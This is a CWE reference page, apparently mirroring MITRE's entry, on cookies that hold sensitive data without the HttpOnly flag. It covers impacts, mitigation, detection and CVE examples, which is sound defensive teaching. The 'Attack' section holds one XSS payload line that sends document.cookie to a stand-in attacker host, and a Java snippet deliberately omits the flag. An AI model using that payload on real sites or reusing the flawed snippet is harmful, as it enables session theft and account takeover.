1. Home
  2. CWE Database
  3. CWE-1004
Variant · Low-Medium

CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag

The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.

CWE-1004 · Variant Level ·4 CVEs ·1 Mitigations

Description

The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.

Potential Impact

Confidentiality

Read Application Data

Integrity

Gain Privileges or Assume Identity

Demonstrative Examples

In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.
The snippet of code below establishes a new cookie to hold the sessionID.
Bad
String sessionID = generateSessionId();Cookie c = new Cookie("session_id", sessionID);response.addCookie(c);
The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:
Attack
document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '">'
When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.
To mitigate the risk, use the setHttpOnly(true) method.
Good
String sessionID = generateSessionId();Cookie c = new Cookie("session_id", sessionID);c.setHttpOnly(true);response.addCookie(c);

Mitigations & Prevention

Implementation High

Leverage the HttpOnly flag when setting a sensitive cookie in a response.

Detection Methods

  • Automated Static Analysis High — Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then sea

Real-World CVE Examples

CVE IDDescription
CVE-2024-47833python library for ML and data science does not use the HTTPOnly security attribute for session cookies
CVE-2022-24045Web application for a room automation system has client-side Javascript that sets a sensitive cookie without the HTTPOnly security attribute, allowing the cookie to be accessed.
CVE-2014-3852CMS written in Python does not include the HTTPOnly flag in a Set-Cookie header, allowing remote attackers to obtain potentially sensitive information via script access to this cookie.
CVE-2015-4138Appliance for managing encrypted communications does not use HttpOnly flag.

CWE-732: Incorrect Permission Assignment for Critical Resource

The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modi...

Frequently Asked Questions

What is CWE-1004?

CWE-1004 (Sensitive Cookie Without 'HttpOnly' Flag) is a software weakness identified by MITRE's Common Weakness Enumeration. It is classified as a Variant-level weakness. The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.

How can CWE-1004 be exploited?

Attackers can exploit CWE-1004 (Sensitive Cookie Without 'HttpOnly' Flag) to read application data. This weakness is typically introduced during the Implementation phase of software development.

How do I prevent CWE-1004?

Key mitigations include: Leverage the HttpOnly flag when setting a sensitive cookie in a response.

What is the severity of CWE-1004?

CWE-1004 is classified as a Variant-level weakness (Low-Medium abstraction). It has been observed in 4 real-world CVEs.